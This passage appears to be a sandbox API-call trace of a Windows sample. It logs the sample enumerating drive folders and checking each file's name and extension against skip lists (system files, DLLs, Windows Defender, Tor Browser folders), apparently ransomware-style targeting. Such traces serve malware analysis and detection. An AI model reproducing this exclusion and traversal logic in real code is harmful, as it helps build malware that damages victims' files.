lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.129] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.129] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.130] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.130] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.131] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.131] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.131] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.131] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.131] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.131] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.131] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.131] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0058.131] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.131] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0058.132] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0058.132] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 2 [0058.134] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0058.134] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="PAGEFILE.SYS", cchCount2=12) returned 3 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0058.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 2 [0058.136] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0058.136] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6eeb620, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6eeb620, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0058.136] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6eeb620, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6eeb620, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6946c8 [0058.136] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6eeb620, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6eeb620, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.136] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0058.136] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="INI", cchCount2=3) returned 1 [0058.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="INI", cchCount2=3) returned 3 [0058.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="INI", cchCount2=3) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0058.138] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0d9f2e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0d9f2e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe28d8e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28d8e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0058.139] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1b29000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1b29000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0058.139] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1b29000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1b29000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6989b0 [0058.147] FindNextFileW (in: hFindFile=0x6989b0, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1b29000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1b29000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.147] FindNextFileW (in: 